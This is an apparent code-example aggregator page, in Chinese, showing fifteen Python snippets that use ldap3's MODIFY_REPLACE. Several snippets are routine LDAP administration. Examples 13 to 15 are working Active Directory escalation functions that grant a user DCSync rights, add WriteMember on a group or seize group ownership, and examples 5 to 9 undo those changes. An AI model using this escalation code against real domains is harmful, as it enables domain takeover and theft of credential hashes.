本文整理汇总了Python中ldap3.MODIFY_REPLACE属性的典型用法代码示例。如果您正苦于以下问题:Python ldap3.MODIFY_REPLACE属性的具体用法?Python ldap3.MODIFY_REPLACE怎么用?Python ldap3.MODIFY_REPLACE使用的例子?那么恭喜您, 这里精选的属性代码示例或许可以为您提供帮助。您也可以进一步了解该属性所在类ldap3的用法示例。
在下文中一共展示了ldap3.MODIFY_REPLACE属性的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: _create_ldap_modify_changes
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def _create_ldap_modify_changes(self, attributes, uid):
"""
Identifies if an LDAP attribute already exists and if the value needs to be updated, deleted or added.
:param attributes: Attributes to be updated
:type attributes: dict
:param uid: The uid of the user object in the resolver
:type uid: basestring
:return: dict with attribute name as keys and values
"""
modify_changes = {}
uinfo = self.getUserInfo(uid)
for fieldname, value in attributes.items():
if value:
if fieldname in uinfo:
modify_changes[fieldname] = [MODIFY_REPLACE, [value]]
else:
modify_changes[fieldname] = [MODIFY_ADD, [value]]
else:
modify_changes[fieldname] = [MODIFY_DELETE, [value]]
return modify_changes 示例2: installRadius
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def installRadius():
tmp_dir = os.path.join(setupObj.staticFolder, 'radius', 'templates')
radius_ldif_fp = os.path.join(tmp_dir, 'gluu_radius_server.ldif')
setupObj.renderTemplateInOut(
os.path.join(radius_ldif_fp),
tmp_dir,
os.path.join(ces_dir, 'output'),
)
setupObj.install_gluu_radius()
setupObj.run([setupObj.cmd_chown, 'radius:gluu', os.path.join(setupObj.certFolder, 'gluu-radius.private-key.pem')])
setupObj.run([setupObj.cmd_chmod, '660', os.path.join(setupObj.certFolder, 'gluu-radius.private-key.pem')])
dn, oxAuthConfiguration = get_oxAuthConfiguration_ldap()
oxAuthConfiguration['openidScopeBackwardCompatibility'] = True
oxAuthConfiguration['legacyIdTokenClaims'] = True
oxAuthConfiguration_js = json.dumps(oxAuthConfiguration, indent=2)
ldap_conn.modify(
dn,
{"oxAuthConfDynamic": [ldap3.MODIFY_REPLACE, oxAuthConfiguration_js]}
)
ldap_conn.modify(
'ou=configuration,o=gluu',
{"gluuRadiusEnabled": [ldap3.MODIFY_REPLACE, 'true']}
)
ldap_conn.modify(
'inum=B8FD-4C11,ou=scripts,o=gluu',
{"oxEnabled": [ldap3.MODIFY_REPLACE, 'true']}
) 示例3: change_password
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def change_password(self, uid, password_hash):
dn = ",".join((f"uid={uid}", self.user_base))
changes = {"userPassword": [(MODIFY_REPLACE, ["{CRYPT}" + password_hash])]}
self.connection.modify(dn, changes) 示例4: update_group_members
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def update_group_members(self, cn, members):
dn = ",".join((f"cn={cn}", self.group_base))
if members:
changes = {"memberUid": [(MODIFY_REPLACE, members)]}
else:
changes = {"memberUid": [(MODIFY_DELETE, [])]}
self.connection.modify(dn, changes) 示例5: remove_addmember_privs
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def remove_addmember_privs(ldapconnection, data):
# Set SD flags to only query for DACL
controls = security_descriptor_control(sdflags=0x04)
usersid = data['target_sid']
ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
old_sd = binascii.unhexlify(data['old_sd'])
if secDescData == old_sd:
print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
return True
new_sd = binascii.unhexlify(data['new_sd'])
if secDescData != new_sd:
# Manual operation
accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
if RestoreOperation.dacl_remove_ace(secDesc, 'bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype):
print_m('Removing ACE using manual approach')
replace_sd = secDesc.getData()
else:
raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
else:
# We can simply restore the old SD since the current SD is identical to the one after our modification
print_m('Removing ACE using SD restore approach')
replace_sd = old_sd
res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
if res:
print_o('AddMember privileges restored successfully')
return True
else:
raise RestoreException('Failed to restore WriteMember privs on group %s: %s' % (data['target_dn'], str(ldapconnection.result))) 示例6: remove_domain_sync
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def remove_domain_sync(ldapconnection, data):
# Set SD flags to only query for DACL
controls = security_descriptor_control(sdflags=0x04)
usersid = data['target_sid']
ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
old_sd = binascii.unhexlify(data['old_sd'])
if secDescData == old_sd:
print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
return True
new_sd = binascii.unhexlify(data['new_sd'])
if secDescData != new_sd:
accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
# these are the GUIDs of the get-changes and get-changes-all extended attributes
if RestoreOperation.dacl_remove_ace(secDesc, '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype) and \
RestoreOperation.dacl_remove_ace(secDesc, '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype):
print_m('Removing ACE using manual approach')
replace_sd = secDesc.getData()
else:
raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
else:
# We can simply restore the old SD since the current SD is identical to the one after our modification
print_m('Removing ACE using SD restore approach')
replace_sd = old_sd
res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
if res:
print_o('Domain Sync privileges restored successfully')
return True
else:
raise RestoreException('Failed to restore Domain sync privs on domain %s: %s' % (data['target_dn'], str(ldapconnection.result))) 示例7: remove_addmember_privs
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def remove_addmember_privs(ldapconnection, data):
# Set SD flags to only query for DACL
controls = security_descriptor_control(sdflags=0x04)
usersid = data['target_sid']
ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
old_sd = binascii.unhexlify(data['old_sd'])
if secDescData == old_sd:
print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
return True
new_sd = binascii.unhexlify(data['new_sd'])
if secDescData != new_sd:
# Manual operation
accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
if RestoreOperation.dacl_remove_ace(secDesc, 'bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype):
print_m('Removing ACE using manual approach')
replace_sd = secDesc.getData()
else:
raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
else:
# We can simply restore the old SD since the current SD is identical to the one after our modification
print_i('Removing ACE using SD restore approach')
replace_sd = old_sd
res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
if res:
print_o('AddMember privileges restored successfully')
return True
else:
raise RestoreException('Failed to restore WriteMember privs on group %s: %s' % (data['target_dn'], str(ldapconnection.result))) 示例8: remove_domain_sync
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def remove_domain_sync(ldapconnection, data):
# Set SD flags to only query for DACL
controls = security_descriptor_control(sdflags=0x04)
usersid = data['target_sid']
ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
old_sd = binascii.unhexlify(data['old_sd'])
if secDescData == old_sd:
print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
return True
new_sd = binascii.unhexlify(data['new_sd'])
if secDescData != new_sd:
accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
# these are the GUIDs of the get-changes and get-changes-all extended attributes
if RestoreOperation.dacl_remove_ace(secDesc, '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype) and \
RestoreOperation.dacl_remove_ace(secDesc, '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype):
print_m('Removing ACE using manual approach')
replace_sd = secDesc.getData()
else:
raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
else:
# We can simply restore the old SD since the current SD is identical to the one after our modification
print_i('Removing ACE using SD restore approach')
replace_sd = old_sd
res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
if res:
print_o('Domain Sync privileges restored successfully')
return True
else:
raise RestoreException('Failed to restore Domain sync privs on domain %s: %s' % (data['target_dn'], str(ldapconnection.result))) 示例9: remove_owner
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def remove_owner(ldapconnection, data):
# Set SD flags to only query for owner
controls = security_descriptor_control(sdflags=0x01)
usersid = data['old_owner_sid']
ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
if secDesc['OwnerSid'].formatCanonical() == usersid:
print_m('%s is owned by the same user as before exploitation, skipping' % data['target_dn'])
return True
secDesc['OwnerSid'] = LDAP_SID()
secDesc['OwnerSid'].fromCanonical(usersid)
secdesc_data = secDesc.getData()
res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [secdesc_data])}, controls=controls)
if res:
print_o('Owner restore succesful')
return True
else:
# Constraintintersection means we can't change the owner to this SID
# TODO: investigate why this is and possible workarounds
if ldapconnection.result['result'] == 19:
print_f('Failed to change owner of group %s to %s. This is a known limitation, please restore the owner manually.' % (data['target_dn'], usersid))
# Treat this as a success
return True
raise RestoreException('Failed to change owner of group %s to %s: %s' % (data['target_dn'], usersid, str(ldapconnection.result))) 示例10: run
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def run(self, params={}):
conn = self.connection.conn
dn = params.get('distinguished_name')
dn = ADUtils.dn_normalize(dn)
temp_list = ADUtils.dn_escape_and_split(dn)
dc_list = [s for s in temp_list if 'DC' in s]
dc = ','.join(dc_list)
escaped_dn = ','.join(temp_list)
pairs = ADUtils.find_parentheses_pairs(escaped_dn)
# replace ( and ) when they are part of a name rather than a search parameter
if pairs:
for key, value in pairs.items():
tempstring = escaped_dn
if tempstring.find('=', key, value) == -1:
escaped_dn = escaped_dn[:value] + '\\29' + escaped_dn[value + 1:]
escaped_dn = escaped_dn[:key] + '\\28' + escaped_dn[key + 1:]
self.logger.info(escaped_dn)
conn.search(search_base=dc,
search_filter=f'(distinguishedName={escaped_dn})',
attributes=['userAccountControl']
)
results = conn.response
dn_test = [d['dn'] for d in results if 'dn' in d]
try:
dn_test[0]
except Exception as ex:
self.logger.error('The DN ' + dn + ' was not found')
raise PluginException(cause='The DN was not found',
assistance='The DN ' + dn + ' was not found') from ex
user_list = [d["attributes"] for d in results if "attributes" in d]
user_control = user_list[0]
try:
account_status = user_control['userAccountControl']
except Exception as ex:
self.logger.error('The DN ' + dn + ' is not a user')
raise PluginException(cause='The DN is not a user',
assistance='The DN ' + dn + ' is not a user') from ex
user_account_flag = 2
account_status = account_status & ~user_account_flag
conn.modify(escaped_dn, {'userAccountControl': [(MODIFY_REPLACE, [account_status])]})
result = conn.result
output = result['description']
if result['result'] == 0:
return {'success': True}
self.logger.error('failed: error message %s' % output)
return {'success': False} 示例11: run
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def run(self, params={}):
conn = self.connection.conn
ssl = self.connection.ssl
domain_name = params.get('domain_name')
first_name = params.get('first_name')
last_name = params.get('last_name')
logon_name = params.get('logon_name')
user_ou = params.get('user_ou')
account_disabled = params.get('account_disabled')
password = params.get('password')
additional_parameters = params.get('additional_parameters')
user_principal_name = params.get('user_principal_name')
if account_disabled == 'true':
user_account_control = 514
else:
user_account_control = 512
full_name = first_name + ' ' + last_name
domain_dn = domain_name.replace('.', ',DC=')
if user_ou == "Users":
user_ou = user_ou.replace(',', ',CN=')
else:
user_ou = user_ou.replace(',', ',OU=')
if user_ou == "Users":
dn = 'CN={},CN={},DC={}'.format(full_name, user_ou, domain_dn)
else:
dn = 'CN={},OU={},DC={}'.format(full_name, user_ou, domain_dn)
self.logger.info("User DN=" + dn)
if ssl is False:
self.logger.info('Warning SSL is not enabled. User password can not be set. User account will be disabled')
parameters = {'givenName': first_name, 'sn': last_name, 'sAMAccountName': logon_name,
'userPassword': password, 'userPrincipalName': user_principal_name}
parameters.update(additional_parameters)
log_parameters = parameters
log_parameters.pop("userPassword")
self.logger.info(log_parameters)
conn.add(dn, ['person', 'user'], parameters)
pass_set = extend.ad_modify_password(conn, dn, password, None)
change_uac_attribute = {'userAccountControl': (MODIFY_REPLACE, [user_account_control])}
conn.modify(dn, change_uac_attribute)
self.logger.info(conn.result)
return {'success': pass_set} 示例12: run
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def run(self, params={}):
conn = self.connection.conn
dn = params.get('distinguished_name')
dn = ADUtils.dn_normalize(dn)
temp_list = ADUtils.dn_escape_and_split(dn)
dc_list = [s for s in temp_list if 'DC' in s]
dc = ','.join(dc_list)
escaped_dn = ','.join(temp_list)
pairs = ADUtils.find_parentheses_pairs(escaped_dn)
self.logger.info(pairs)
# replace ( and ) when they are part of a name rather than a search parameter
if pairs:
for key, value in pairs.items():
tempstring = escaped_dn
if tempstring.find('=', key, value) == -1:
escaped_dn = escaped_dn[:value] + '\\29' + escaped_dn[value + 1:]
escaped_dn = escaped_dn[:key] + '\\28' + escaped_dn[key + 1:]
self.logger.info(escaped_dn)
conn.search(search_base=dc,
search_filter=f'(distinguishedName={escaped_dn})',
attributes=['userAccountControl']
)
results = conn.response
dn_test = [d['dn'] for d in results if 'dn' in d]
try:
dn_test[0]
except Exception as ex:
self.logger.error('The DN ' + escaped_dn + ' was not found')
raise PluginException(cause="The DN was not found",
assistance="The DN " + escaped_dn + " was not found") from ex
user_list = [d['attributes'] for d in results if 'attributes' in d]
user_control = user_list[0]
try:
account_status = user_control['userAccountControl']
except Exception as ex:
self.logger.error('The DN ' + escaped_dn + ' is not a user')
raise PluginException(cause="The DN is not a user",
assistance="The DN " + escaped_dn + " is not a user") from ex
user_account_flag = 2
account_status = account_status | user_account_flag
conn.modify(escaped_dn, {'userAccountControl': [(MODIFY_REPLACE, [account_status])]})
result = conn.result
output = result['description']
if result['result'] == 0:
return {'success': True}
self.logger.error('failed: error message %s' % output)
return {'success': False} 示例13: add_domain_sync
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def add_domain_sync(ldapconnection, state, user_sam, domain_name):
# Query for the sid of our target user
userdn, usersid = get_object_info(ldapconnection, user_sam)
# Set SD flags to only query for DACL
controls = security_descriptor_control(sdflags=0x04)
# Dictionary for restore data
restoredata = {}
# print_m('Querying domain security descriptor')
ldapconnection.search(get_ldap_root(ldapconnection), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
# This shouldn't happen but lets be sure just in case
if ldap2domain(entry.entry_dn).upper() != domain_name.upper():
raise ExploitException('Wrong domain! LDAP returned the domain %s but escalation was requested to %s' % (ldap2domain(entry.entry_dn).upper(), domain_name.upper()))
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
# Save old SD for restore purposes
restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
restoredata['target_sid'] = usersid
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
# We need "control access" here for the extended attribute
accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
# these are the GUIDs of the get-changes and get-changes-all extended attributes
secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype))
secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype))
dn = entry.entry_dn
restoredata['target_dn'] = dn
data = secDesc.getData()
res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
if res:
print_o('Dacl modification successful')
# Query the SD again to see what AD made of it
ldapconnection.search(get_ldap_root(ldapconnection), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
newSD = entry['nTSecurityDescriptor'].raw_values[0]
# Save this to restore the SD later on
restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
restoredata['success'] = True
state.push_history('add_domain_sync', restoredata)
return True
else:
restoredata['success'] = False
state.push_history('add_domain_sync', restoredata)
raise ExploitException('Failed to add DCSync privs to %s: %s' % (userdn, str(ldapconnection.result))) 示例14: add_addmember_privs
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def add_addmember_privs(ldapconnection, state, user_sam, group_bh_name):
# Query for the sid of our target user
userdn, usersid = get_object_info(ldapconnection, user_sam)
# Set SD flags to only query for DACL
controls = security_descriptor_control(sdflags=0x04)
# Dictionary for restore data
restoredata = {}
# print_m('Querying group security descriptor')
group_sam = get_sam_name(group_bh_name)
ldapconnection.search(get_ldap_root(ldapconnection), '(sAMAccountName=%s)' % escape_filter_chars(group_sam), attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
# Save old SD for restore purposes
restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
restoredata['target_sid'] = usersid
# We need "write property" here to write to the "member" attribute
accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
# this is the GUID of the Member attribute
secDesc['Dacl']['Data'].append(create_object_ace('bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype))
dn = entry.entry_dn
restoredata['target_dn'] = dn
data = secDesc.getData()
res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
if res:
print_o('Dacl modification successful')
# Query the SD again to see what AD made of it
ldapconnection.search(dn, '(objectClass=*)', search_scope=ldap3.BASE , attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
newSD = entry['nTSecurityDescriptor'].raw_values[0]
newSecDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=newSD)
# Save this to restore the SD later on
restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
restoredata['success'] = True
state.push_history('add_addmember_privs', restoredata)
return True
else:
restoredata['success'] = False
state.push_history('add_addmember_privs', restoredata)
# filter out already exists?
raise ExploitException('Failed to add WriteMember privs for %s to group %s: %s' % (userdn, dn, str(ldapconnection.result))) 示例15: write_owner
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def write_owner(ldapconnection, state, user_sam, group_bh_name):
# Query for the sid of our target user
userdn, usersid = get_object_info(ldapconnection, user_sam)
# Set SD flags to only query for owner
controls = security_descriptor_control(sdflags=0x01)
group_sam = get_sam_name(group_bh_name)
# Dictionary for restore data
restoredata = {}
ldapconnection.search(get_ldap_root(ldapconnection), '(sAMAccountName=%s)' % escape_filter_chars(group_sam), attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = ldapconnection.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
if secDesc['OwnerSid'].formatCanonical() == usersid:
print_m('%s is already owned by %s, skipping' % (group_sam, user_sam))
return True
# Save old SD for restore purposes
restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
restoredata['target_sid'] = usersid
restoredata['old_owner_sid'] = secDesc['OwnerSid'].formatCanonical()
# Modify the sid
secDesc['OwnerSid'] = LDAP_SID()
secDesc['OwnerSid'].fromCanonical(usersid)
dn = entry.entry_dn
restoredata['target_dn'] = dn
data = secDesc.getData()
res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
if res:
print_o('Owner change successful')
restoredata['success'] = True
state.push_history('write_owner', restoredata)
return True
else:
restoredata['success'] = False
state.push_history('write_owner', restoredata)
raise ExploitException('Failed to change owner of group %s to %s: %s' % (dn, userdn, str(ldapconnection.result)))